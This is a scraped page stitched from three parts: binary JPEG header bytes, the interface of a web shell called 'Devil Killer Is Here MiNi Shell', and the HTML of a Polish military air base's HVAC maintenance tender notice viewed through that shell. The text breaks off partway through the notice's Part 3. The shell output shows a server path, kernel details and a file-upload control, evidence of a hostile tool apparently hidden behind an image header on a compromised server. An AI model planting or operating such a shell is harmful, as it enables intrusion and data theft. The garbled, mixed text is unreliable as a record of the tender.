JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230224/0011040101-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Konserwacja i naprawa instalacji wentylacji, klimatyzacji i nawilżania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">32 Baza Lotnictwa Taktycznego w Łasku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730097572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">9 - go Maja 95</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łask</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">32bltprz@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://32blt.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Konserwacja i naprawa instalacji wentylacji, klimatyzacji i nawilżania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f8461a39-b43a-11ed-b8d9-2a18c1f2976f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00110401</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-02-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/32blt/public/postepowanie?postepowanie=42582058 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest za pośrednictwem elektronicznej platformy zakupowej. <br/>Zmiany ogłoszenia, wyjaśnienia treści SWZ, składanie ofert oraz komunikacja między Wykonawcą a Zamawiającym odbywać się będzie poprzez platformę zakupową. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta w Systemie, ani logowania do Systemu. Uczestnictwo w postępowaniu wymaga założenia konta użytkownika w sposób określony w „Instrukcji użytkownika Wykonawcy”, dostępnym pod adresem: https://portal.smartpzp.pl/elearning (zakładka E-LEARNING zawiera również filmy instruktażowe dotyczące funkcjonalności oprogramowania). <br/>Dodatkowe informacje na temat komunikacji w sprawie postępowania zawiera SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Do pełnego i prawidłowego korzystania z Systemu przez Użytkowników Zewnętrznych konieczne jest posiadanie przez co najmniej jednego uprawnionego Użytkownika Zewnętrznego Wykonawcy kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub podpisu osobistego służącego do autentykacji i podpisu.<br/>Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej zapewnionych w Systemie jest uzależnione od uprzedniej akceptacji przez Wykonawcę Regulaminu korzystania z usług Systemu na witrynie internetowej przy zakładaniu profilu Wykonawcy.<br/>Za pośrednictwem posiadanego w Systemie konta Użytkownika Zewnętrznego tj. użytkownika Wykonawcy odbywa się komunikacja Wykonawcy z Zamawiającym w postępowaniu, w szczególności: przekazywanie dokumentów, oświadczeń, informacji, pytań, wniosków w ramach postępowania.<br/>Zadawanie pytań przez Wykonawców odbywa się w zakładce „Pytania do postępowania”.<br/>Korzystanie z Systemu możliwe jest, pod warunkiem spełnienia następujących minimalnych wymagań technicznych:<br/>1. Stały dostęp do sieci Internet o gwarantowanej przepustowości, nie mniejszej niż 1Mb/s.<br/>2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich nowsze wersje.<br/>3. arki internetowe: Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11. Lista zalecanych arek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji arek<br/>4. Dodatkowe oprogramowanie: zainstalowane środowisko Java w wersji min. 1.8 (jre), w przypadku arek Opera, Chrome i Firefox należy doinstalować dodatek do arki Szafir SDK Web, oprogramowania SzafirHost w systemie operacyjnym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">związku z przetwarzaniem danych osobowych Zamawiający informuje, że:<br/>1. Administratorem danych osobowych jest: 32 Baza Lotnictwa Taktycznego w Łasku, 98-100 Łask, ul. 9-go Maja 95.<br/>2. Inspektorem ochrony danych osobowych w 32. Bazie Lotnictwa Taktycznego w Łasku jest Pan Paweł Rogala, tel. 261 554 639, email: p.rogala@ron.mil.pl.<br/>3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia niniejszego postępowania o udzielenie zamówienia publicznego nr referencyjny: 18/TP2/2023.<br/>4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2022 r. poz. 1710 ze zm.), dalej „ustawa Pzp”.<br/>5. Zgodnie z art. 78 ust. 1 ustawy Pzp, dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Obowiązek podania danych osobowych Wykonawcy lub osób występujących w jego imieniu jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Wykonawcy przysługuje:<br/>−na podstawie art. 15 RODO prawo dostępu do danych osobowych;<br/>−na podstawie art. 16 RODO prawo do sprostowania danych osobowych;<br/>−na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>−prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy przetwarzanie danych osobowych narusza przepisy RODO.<br/>9. Wykonawcy nie przysługuje:<br/>−w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">18/TP2/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 477107,34 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na konserwacji i naprawach urządzeń i instalacji: wentylacji, klimatyzacji, nawilżania i osuszania powietrza z podziałem na części:<br/>Część 1 – Instalacje Wentylacji – VTS Clima, VBW, Clima Produkt, pompy ciepła Clint –urządzenia filtrująco-wentylacyjne Awas , urządzenia osuszania powietrza (32 BLT Łask).<br/>2. Szczegółowy opis przedmiotu zamówienia i wykaz obiektów określa załączona do SWZ dokumentacja, składająca się z:<br/>2.1. Wykaz urządzeń podlegających konserwacji i naprawy - załącznik nr 9 do SWZ,<br/>2.2. Zakres konserwacji – załącznik nr 10 do SWZ,<br/>2.3. Harmonogram prac – załącznik nr 11 do SWZ.<br/>3. Przedmiot zamówienia obejmuje:<br/>3.1. konserwacje prowadzone według wytycznych zawartych w załącznikach, o których mowa w ust. 2 oraz we wzorze umowy stanowiącym załącznik nr 4 do SWZ;<br/>3.2. usuwanie awarii i naprawy urządzeń wskazanych w wykazie urządzeń (zał. nr 9 do SWZ) wg stawki roboczogodziny (zł) wskazanej w ofercie Wykonawcy na zasadach określonych w dokumentach zamówienia, w szczególności we wzorze umowy stanowiącym załącznik nr 4 do SWZ.<br/>4. Usługa musi odpowiadać wymaganiom Zamawiającego opisanym w załącznikach do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 137709,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</p> <p class="mb-0">50710000-5 - Usługi w zakresie napraw i konserwacji elektrycznych i mechanicznych instalacji budynkowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W częściach 1 – 4 za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria oraz wg wzorów w SWZ.<br/>Kryterium 1: Cena (brutto) Oferty - waga- 60 %, w tym:<br/>- podkryterium: cena usługi - waga 45%<br/>- podkryterium: wartość jednej roboczogodziny w zakresie usługi naprawy - waga 15%<br/>Kryterium 2: CR Czas (liczony w godzinach) Reakcji - waga-20 %<br/>Kryterium 3:CG Czas (liczony w miesiącach) Gwarancji- waga-20%<br/>Maksymalna liczba punktów CO + CR + CG= 100%=100 pkt<br/><br/>Kryterium „Cena Oferty” (CO) – 60% (na cenę oferty składa się cena usługi i cena jednej roboczogodziny).<br/>Cena oferty (CO) w powyższym kryterium zawiera:<br/>A. CENĘ USŁUGI (CU) tzn. łączna cena brutto za usługę konserwacji wg pozycji w formularzu cenowym (złącznik nr 3 do SWZ) za każdą część zamówienia;<br/>B. CENĘ ROBOCZOGODZINY (CR) tzn. cenę za jedną godzinę robocizny brutto w przypadku wykonywania usługi naprawy wg oferty Wykonawcy w formularzu ofertowym (załącznik nr 1 do SWZ) za każdą część zamówienia.<br/><br/>Kryterium – czas reakcji – CR – 20 %<br/>Zamawiający stawia warunek, iż Wykonawca zachowa gotowość przystąpienia do realizacji przedmiotu umowy przez 7 dni w tygodniu, po wcześniejszym otrzymaniu zgłoszenia o awarii dowolnego urządzenia stanowiącego przedmiot umowy w czasie min. 2 godz. i maksymalnie 24 godz. od momentu otrzymania zgłoszenia.<br/><br/>Kryterium – czas gwarancji – CG – 20 %<br/>Czas gwarancji to oferowana przez Wykonawcę gwarancja na wszystkie wykonywane prace związane z konserwacją, naprawa, usuwaniem uszkodzeń lub awarii w tym na zamontowane nowe części i elementy instalacji dla każdej z części zamówienia, na którą ofertę składa Wykonawca.<br/><br/>Oferta, która otrzyma najwięcej punktów w powyższych kryteriach: CO + CR + CG zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór najkorzystniejszej oferty będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie Zamawiający wezwie Wykonawców do złożenia oferty dodatkowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na konserwacji i naprawach urządzeń i instalacji: wentylacji, klimatyzacji, nawilżania i osuszania powietrza z podziałem na części:<br/><br/>Część 2 – Instalacje Wentylacji i Nawilżania – Swegon, Walter Mayer (32 BLT Łask).<br/><br/>2. Szczegółowy opis przedmiotu zamówienia i wykaz obiektów określa załączona do SWZ dokumentacja, składająca się z:<br/>2.1. Wykaz urządzeń podlegających konserwacji i naprawy - załącznik nr 9 do SWZ,<br/>2.2. Zakres konserwacji – załącznik nr 10 do SWZ,<br/>2.3. Harmonogram prac – załącznik nr 11 do SWZ.<br/>3. Przedmiot zamówienia obejmuje:<br/>3.1. konserwacje prowadzone według wytycznych zawartych w załącznikach, o których mowa w ust. 2 oraz we wzorze umowy stanowiącym załącznik nr 4 do SWZ;<br/>3.2. usuwanie awarii i naprawy urządzeń wskazanych w wykazie urządzeń (zał. nr 9 do SWZ) wg stawki roboczogodziny (zł) wskazanej w ofercie Wykonawcy na zasadach określonych w dokumentach zamówienia, w szczególności we wzorze umowy stanowiącym załącznik nr 4 do SWZ.<br/>4. Usługa musi odpowiadać wymaganiom Zamawiającego opisanym w załącznikach do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 40365,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50730000-1 - Usługi w zakresie napraw i konserwacji układów chłodzących</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50712000-9 - Usługi w zakresie napraw i konserwacji mechanicznych instalacji budynkowych</p> <p class="mb-0">50710000-5 - Usługi w zakresie napraw i konserwacji elektrycznych i mechanicznych instalacji budynkowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W częściach 1 – 4 za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria oraz wg wzorów w SWZ.<br/>Kryterium 1: Cena (brutto) Oferty - waga- 60 %, w tym:<br/>- podkryterium: cena usługi - waga 45%<br/>- podkryterium: wartość jednej roboczogodziny w zakresie usługi naprawy - waga 15%<br/>Kryterium 2: CR Czas (liczony w godzinach) Reakcji - waga-20 %<br/>Kryterium 3:CG Czas (liczony w miesiącach) Gwarancji- waga-20%<br/>Maksymalna liczba punktów CO + CR + CG= 100%=100 pkt<br/><br/>Kryterium „Cena Oferty” (CO) – 60% (na cenę oferty składa się cena usługi i cena jednej roboczogodziny).<br/>Cena oferty (CO) w powyższym kryterium zawiera:<br/>A. CENĘ USŁUGI (CU) tzn. łączna cena brutto za usługę konserwacji wg pozycji w formularzu cenowym (złącznik nr 3 do SWZ) za każdą część zamówienia;<br/>B. CENĘ ROBOCZOGODZINY (CR) tzn. cenę za jedną godzinę robocizny brutto w przypadku wykonywania usługi naprawy wg oferty Wykonawcy w formularzu ofertowym (załącznik nr 1 do SWZ) za każdą część zamówienia.<br/><br/>Kryterium – czas reakcji – CR – 20 %<br/>Zamawiający stawia warunek, iż Wykonawca zachowa gotowość przystąpienia do realizacji przedmiotu umowy przez 7 dni w tygodniu, po wcześniejszym otrzymaniu zgłoszenia o awarii dowolnego urządzenia stanowiącego przedmiot umowy w czasie min. 2 godz. i maksymalnie 24 godz. od momentu otrzymania zgłoszenia.<br/><br/>Kryterium – czas gwarancji – CG – 20 %<br/>Czas gwarancji to oferowana przez Wykonawcę gwarancja na wszystkie wykonywane prace związane z konserwacją, naprawa, usuwaniem uszkodzeń lub awarii w tym na zamontowane nowe części i elementy instalacji dla każdej z części zamówienia, na którą ofertę składa Wykonawca.<br/><br/>Oferta, która otrzyma najwięcej punktów w powyższych kryteriach: CO + CR + CG zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>Jeżeli wybór najkorzystniejszej oferty będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie Zamawiający wezwie Wykonawców do złożenia oferty dodatkowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na konserwacji i naprawach urządzeń i instalacji: wentylacji, klimatyzacji, nawilżania i osuszania powietrza z podziałem na części:<br/>Część 3 – Instalacje Klimatyzacji - Kaisai, GEA, Aermec, McQuay, LG VRF, Windex, Excel, Fujitsu, Daikin, Hitachi, Zibro, Gree, Mitsubishi, 